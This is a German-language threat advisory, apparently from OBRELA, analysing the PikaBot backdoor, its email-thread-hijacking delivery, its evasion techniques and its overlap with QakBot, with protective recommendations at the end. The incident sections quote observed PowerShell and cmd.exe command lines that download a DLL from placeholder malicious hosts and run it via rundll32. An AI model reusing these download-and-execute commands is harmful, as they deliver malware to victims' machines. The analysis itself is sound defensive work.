PikaBot - eine neue aufkommende Bedrohung

Wichtige Punkte

PikaBot ist eine aufkommende bösartige Hintertür, die seit Anfang 2023 Systeme kompromittiert, indem sie anderen Angreifern Zugang für Ransomware, Krypto-Mining, Datendiebstahl und Fernsteuerung verschafft.
Zu seinen Verbreitungsmethoden gehören Phishing über E-Mail-Thread-Hijacking mit ZIP-Anhängen, die eingebettete JS-Dateien enthalten, die die PikaBot-Malware abrufen.
Priorisiert die Umgehung der Verteidigung durch Anti-Debugging- und Anti-VM-Maßnahmen.
Verwendet ein proprietäres C2-Framework, das verschiedene Befehle unterstützt.
Auffällige Parallelen zwischen PikaBot und dem entschärften QakBot-Trojaner sind das Hijacking von E-Mail-Bedrohungen, eindeutige URL-Muster, eine nahezu identische Infektionskette und Loader-Funktionen.
TA577, ein finanziell motivierter Access Broker, der in der Vergangenheit mit der Verbreitung von QakBot in Verbindung gebracht wurde, wird bei der Verbreitung von PikaBot beobachtet.
OBRELA identifizierte eine neue QakBot-PikaBot-Überlappungstechnik, bei der zufällig benannte Ordner erstellt werden, DLL-Dateien als andere Erweiterung getarnt abgerufen und mit der Erweiterung .OOOOOCCCCCXXXXX gespeichert und ausgeführt werden.
Regelmäßige Software-Updates, zuverlässige Sicherheitstools, Vorsicht bei Online-Inhalten und Downloads, sichere Passwörter, MFA und das Bewusstsein für E-Mail-Thread-Hijacking können vor solchen Bedrohungen schützen.

Übersicht

Im Rahmen einer umfassenden Untersuchung der PikaBot-Malware befasst sich dieser Hinweis mit den heimtückischen Fähigkeiten und Techniken, die diese neue bösartige Backdoor einsetzt. Seit seinem Auftauchen Anfang 2023 stellt PikaBot eine erhebliche Bedrohung dar, da er unbefugten Fernzugriff auf kompromittierte Systeme ermöglicht. In diesem Artikel werden die vielfältigen Operationen von PikaBot erläutert, von den Verbreitungsmethoden bis hin zur Ausführung bösartiger Aktivitäten. Bei der Analyse der Funktionsweise von PikaBot werden Parallelen zum entschärften QakBot-Trojaner deutlich, die ein Licht auf die sich entwickelnde Landschaft der Cyberbedrohungen werfen. Darüber hinaus bietet das Advisory wertvolle Einblicke in den historischen Kontext von QakBot und seine Verbindung zur cyberkriminellen Gruppe TA577, die Erkenntnisse von OBRELA über neue, sich überschneidende Techniken von QakBot und PikaBot sowie Empfehlungen zur Stärkung der digitalen Sicherheit gegen solch starke Bedrohungen.

PikaBot-Fähigkeiten

PikaBot, eine aufkommende bösartige Backdoor, kompromittiert seit Anfang 2023 aktiv Systeme und verschafft den Angreifern unbefugten Fernzugriff. Diese heimtückische Bedrohung ist in der Lage, Befehle von einem Command-and-Control-Server zu empfangen, was das Einschleusen von beliebigem Shellcode, DLLs oder ausführbaren Dateien ermöglicht. PikaBot setzt robuste Anti-VM- und Anti-Debug-Techniken ein. Seine bösartigen Fähigkeiten reichen bis zur Verbreitung von CobaltStrike, Ransomware und verschiedenen anderen Arten von Schadsoftware. Letzteres besteht aus einem Loader und einem Kernmodul und führt die meisten Funktionen der Malware aus, während Ersteres diese bösartigen Aktivitäten erleichtert.

Für den Erstzugang nutzen PikaBot-Distributoren die Methode des E-Mail-Thread-Hijacking, bei der legitime E-Mail-Konversationen abgefangen werden, um bösartige Anhänge oder URLs einzufügen. Die jüngste PikaBot & Darkgate-Kampagne, über die Cofense berichtet, begann im Oktober 2023 und nutzte die Microsoft Exchange Server-Schwachstelle ProxyLogon CVE-2021-26855 aus. Dadurch konnten Bedrohungsakteure die Authentifizierung umgehen, sich als Administratoren ausgeben und bestehende E-Mail-Threads kapern. Das Hijacking von E-Mail-Threads erweist sich als äußerst effektiv, da die Benutzer oft nicht gewarnt werden, dass eine Phishing-E-Mail von einer bestehenden Bedrohung stammen könnte.

Zur Ausführung werden die Opfer dazu verleitet, ZIP-Anhänge zu öffnen oder sie über eingebettete URLs herunterzuladen und zu öffnen, die über zusätzliche Ebenen verfügen, die den Zugriff auf die bösartige Nutzlast auf der Grundlage bestimmter, von den Bedrohungsakteuren definierter Anforderungen einschränken (d. h. ortsspezifisch – ausgenommen sind Rechner in der Gemeinschaft Unabhängiger Staaten, die Mitglieder der ehemaligen Sowjetunion waren – und internetbrowserspezifisch). Das ZIP-Archiv enthält JS-Dateien, die JavaScript-Anwendungen nutzen, um eine Verbindung zu einer anderen URL herzustellen und PikaBot oder DarkGate-Malware herunterzuladen und auszuführen.

PikaBot legt den Schwerpunkt auf die Umgehung von Verteidigungsmaßnahmen und beinhaltet ausgeklügelte Anti-Debugging- und Anti-VM-Maßnahmen, die vom Al-Khaser-Projekt inspiriert sind. Die Loader-Komponente führt Anti-Analyse-Tests durch und verwendet Steganografie, um ihre Nutzlast zu verbergen. Im Falle eines Testfehlers bricht Pikabot die Ausführung ab und vereitelt so die Forschungsanalyse. Zu den Anti-Analyse-Techniken gehören die Überprüfung auf Debugger, Haltepunkte und Systeminformationen, die Verwendung von Tools wie ADVobfuscator zur Verschleierung von Strings und die Anwendung von Methoden zur Erkennung von Sandbox-Umgebungen und Analyseversuchen.

PikaBot verwendet ein proprietäres C2-Framework, das eine Vielzahl von Befehlen für die Enumeration von Hosts und die Injektion von sekundären Nutzdaten unterstützt. Diese Befehle reichen von der Ausführung von Shell-Befehlen über das Abrufen und Ausführen von EXE- oder DLL-Dateien bis hin zum Ändern des C2-Check-in-Intervalls und sogar einem „Zerstörungs“-Befehl.

Die Ziele von PikaBot bergen extreme Gefahren, darunter Krypto-Mining auf kompromittierten Systemen, die Installation von Spyware und Ransomware, der Diebstahl von Anmeldeinformationen und vertraulichen Daten sowie die Möglichkeit der praktischen Fernkontrolle.

Bedrohungsbezogener Kontext

Bemerkenswert ist die Parallelität zwischen Pikabot und dem kürzlich entlarvten QakBot-Trojaner, was die Verbreitungsmethoden, Kampagnen und das Verhalten der Malware betrifft. Trotz der Ankündigung des FBI vom 29. August, dass die Infrastruktur des QakBot-Botnetzes durch eine internationale Koordination der Strafverfolgungsbehörden zerstört wurde, sorgt die unerbittliche Natur der Cybersicherheit dafür, dass neue Bedrohungen auftauchen, um die Lücke zu füllen, die durch die zerstörten Netzwerke entstanden ist.

Cofense machte auf eine neue Malware-Phishing-Kampagne aufmerksam, die, wie bereits erwähnt, DarkGate und PikaBot verbreitete. Obwohl es keine schlüssigen Beweise gibt, die DarkGate und PikaBot mit QakBot in Verbindung bringen, stellt die Cybersicherheits-Community erhebliche Ähnlichkeiten fest. Außerdem tauchte PikaBot gerade dann auf, als die QakBot-Aktivität aufhörte, was auf einen möglichen Zusammenhang hindeutet. Die Täter, die hinter dieser Kampagne stehen, ahmen die Taktik von QakBot nach und verwenden identische Techniken, was entweder auf die Beteiligung von Cyberkriminellen, die mit QakBot verbunden sind, oder auf die Inspiration einer anderen Gruppe oder anderer Gruppen durch das kürzlich aufgelöste kriminelle Netzwerk hindeutet.

Zu den gemeinsamen Techniken von QakBot und PikaBot gehören:

Die Nutzung von gekaperten E-Mail-Bedrohungen für den Erstzugang, ein charakteristisches Merkmal von QakBot.
Die Verwendung von URLs mit eindeutigen Mustern, die den Zugriff des Opfers auf der Grundlage der zuvor genannten Kriterien einschränken, entspricht einem Schlüsselelement von QakBot.
Sie zeigen eine nahezu identische Infektionskette.
Mit Hilfe von Loadern, einer Software, die die eigentliche Schadsoftware auf dem System ablegt.

In der Vergangenheit wurde die cyberkriminelle Gruppe TA577, auch bekannt als Storm-0464, DEV-0464, Hive0118 und TR, bei der Verbreitung von QakBot beobachtet. Dieser produktive, finanziell motivierte Access Broker ist berüchtigt für die Verbreitung von QakBot und die Erleichterung des Zugangs für Ransomware-Betreiber wie Storm-0506, Storm-0216 und Storm-0826, die die Ransomware Black Basta einsetzen. Storm-0464 hat auch andere Malware verbreitet, z. B. SquirrelWaffle und kürzlich PikaBot. Während die geografische Herkunft der Gruppe unbestätigt bleibt, hat sie eine Vielzahl von Branchen und Regionen ins Visier genommen und Schwachstellen wie das Microsoft Support Diagnostic Tool (CVE-2022-30190), ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 und CVE-2021-27065) und ProxyShell (CVE-2021-31207, CVE-2021-34473 und CVE-2021-34523) als Teil ihrer Operationen ausgenutzt.

Neu beobachtete Kampagnen-TTPs

In der Vergangenheit haben OBRELA SOC-Teams auch überlappende Taktiken, Techniken und Verfahren (TTPs) von QakBot und PikaBot festgestellt. Zum Beispiel:

1.Zwischenfall QakBot – März 2023:

In diesem entdeckten Vorfall war der anfängliche Zugangsvektor ein gekaperter E-Mail-Thread, an den der Bedrohungsakteur eine passwortgeschützte ZIP-Datei anhängte, die, nachdem das Opfer sie geöffnet und auf die eingebettete JS-Datei geklickt hatte, den folgenden Prozessbaum identifizierte:

Wscript führt die verdächtige JS-Datei aus.
Der vorherige Wscript-Prozess erzeugte eine verschleierte PowerShell-Befehlszeile, die bei der Entschlüsselung weitere Aktionen zur Umgehung der Verteidigung und die nachfolgende Befehlszeile enthielt:
- ***REDACTED***;Invoke-WebRequest http://{Malicious_IP}/o3YhXn/000 -O $env:TEMPelytroidDeedily.dll; rundll32 $env:TEMPelytroidDeedily.dll,XL55;

Dieser Befehl holt eine DLL-Datei von einem Remote-Server, speichert sie im Temp-Ordner und führt sie dann über Rundll32 aus.

2. Zwischenfall PikaBot – Oktober 2023:

Bei diesem entdeckten Vorfall öffnete das Opfer eine servierte ZIP-Datei und klickte auf die eingebettete JS-Datei. Es wurde der folgende Prozessbaum ermittelt:

Wscript führt die verdächtige JS-Datei aus.
Der vorherige Wscript-Prozess hat die folgende CMD-Befehlszeile erzeugt:
- cmd.exe“ /c pjTG || eCho pjTG & pIng pjTG || Curl http[:]//{Malicious_IP}/PmpZ/Hamma -o %TMP%pjTG.dll & pIng -n 3 pjTG || RUnDLL32 %Tmp%pjTG.dll, CrashForException_ExportThunk & exIT y=dMgDFUHrFAyP

Dieser Befehl holt neben anderen Aktionen, die er ausführt, auch eine DLL-Datei von einem entfernten Server, speichert sie im Temp-Verzeichnis und führt sie dann über rundll32 aus.

Durch den Vergleich dieser beiden Vorfälle können wir auch die Annahme bestätigen, dass sich die Techniken von QakBot und PikaBot überschneiden, da beide eine ZIP-Datei mit eingebetteten JS-Dateien verwenden, die bei der Ausführung CMD/PowerShell-Prozesse starten, um eine DLL-Datei abzurufen, sie im Temp-Verzeichnis zu speichern und sie dann über rundll32 auszuführen.

Darüber hinaus hat Obrela eine weitere technische Überschneidung zwischen den beiden Malwares festgestellt, indem es einen kürzlichen PikaBot-Vorfall entdeckte:

3.^2. Zwischenfall PikaBot – Dezember 2023:

Bei diesem neu entdeckten Vorfall war der ursprüngliche Zugriffsvektor ein gekaperter E-Mail-Thread, in dem der Bedrohungsakteur eine bösartige URL einfügte. Nachdem das Opfer Vertrauen gefasst hatte, klickte es auf den Link, lud eine verdächtige ZIP-Datei herunter, öffnete sie und klickte auf die eingebettete JS-Datei. Es wurde der folgende Prozessbaum ermittelt:

Wscript führt die verdächtige JS-Datei aus
Der vorherige Wscript-Prozess erzeugte mehrere solcher cmd.exe-Instanzen:
- cmd.exe“ /c mkdir C:JildlfgkksRgdbthdnser & curl hxxps[://]{malicious_domain}/iknXn/0[.]05901240746824343[.]dat –output C:JildlfgkksRgdbthdnserJrhrsrhdfrhse.OOOOOCCCCCXXXXX
- cmd.exe“ /c timeout 10 & rundll32 C:JildlfgkksRgdbthdnserJrhrsrhdfrhse.OOOOOCCCCCXXXXX,Enter

Bei diesem Vorfall ist der anfängliche Zugriffsvektor derselbe wie bei QakBot und PikaBot (gekaperte E-Mail-Threads), wobei eine bösartige ZIP-Datei mit JS-Dateien geliefert wird, die eine Datei von einem Remote-Server abrufen und dann über Rundll32 ausführen.

Dieser Vorfall unterschied sich jedoch in folgenden Punkten wesentlich von früheren Begegnungen, was auf den Einsatz ausgefeilterer Verschleierungsmittel hindeutet:

Kein Temp-Verzeichnis verwendet. Stattdessen wird ein neuer (möglicherweise mit einem zufälligen Namen versehener) Ordner erstellt.
Die DLL-Datei ist nun in der angeforderten URL als DAT-Datei getarnt.
Die angeforderte DLL ist nun in dem neu erstellten Ordner mit der seltsamen Erweiterung .OOOOOCCCCCXXXXX gespeichert.

In der Vergangenheit wurde auch QakBot bei ähnlichen Techniken beobachtet:

Erstellen ähnlicher Ordner: z. B.: C:NychtriaByfosrta
Abruf einer als PNG-Datei getarnten DLL-Datei in der angeforderten URL: https://{{malicious_domain}}/0f6eAzyWLUL/Lkmn.png
Die angeforderte DLL-Datei ist in dem neu erstellten Ordner C:NychtriaByfosrta mit diesem Namen und dieser Erweiterung gespeichert: Nyfense.OOOOOCCCCCXXXXX

Somit können wir auch hier eine neue Überschneidung in den TTPs der 2 Malwares beobachten.

Empfehlungen zum Schutz der Bevölkerung

Stellen Sie sicher, dass Ihre Software stets auf dem neuesten Stand ist, d. h. Ihr Betriebssystem, Ihr Webbrowser und andere Anwendungen. Regelmäßige Software-Updates verbessern nicht nur die Leistung, sondern beheben auch Sicherheitslücken und schützen Ihr System vor potenziellen Angriffen durch Malware und böswillige Akteure.
Schützen Sie Ihre Systeme durch die Installation von zuverlässiger Antiviren-Software, Endpoint Detection & Response (EDR) und Security Email Gateway (SEG). Diese unverzichtbaren Programme spielen eine entscheidende Rolle bei der Verhinderung des Eindringens von Malware in Ihr Netzwerk.
Seien Sie vorsichtig, wenn Sie mit Online-Inhalten interagieren; klicken Sie nicht auf Links in E-Mails oder auf unbekannten Websites. Ungeprüfte Links können Sie auf gefährdete Websites umleiten, auf denen sich Schadsoftware befindet.
Seien Sie beim Herunterladen von Dateien vorsichtig und beschränken Sie Downloads auf seriöse und vertrauenswürdige Websites. Stellen Sie sicher, dass die Quelle zuverlässig und bekannt ist, um das Risiko des Herunterladens potenziell schädlicher Dateien zu minimieren.
Erhöhen Sie Ihre digitale Sicherheit, indem Sie robuste Passwörter erstellen und eine Multi-Faktor-Authentifizierung (MFA) implementieren. Erstellen Sie Passwörter mit einer Mindestlänge von 8 Zeichen, die eine Kombination aus Groß- und Kleinbuchstaben, Zahlen und Symbolen enthalten. Verwenden Sie unterschiedliche Kennwörter für verschiedene Konten und aktivieren Sie MFA, um den Schutz vor unbefugtem Zugriff zu verstärken.
Seien Sie wachsam gegenüber dem Hijacking von E-Mail-Themen im Rahmen von Phishing-Angriffen. Erkennen Sie, dass Phishing-Versuche sowohl von unbekannten als auch von bekannten Kontakten ausgehen können. Überprüfen Sie bei E-Mail-Bedrohungen die Identität des Absenders, um mögliche Sicherheitsverletzungen zu vereiteln.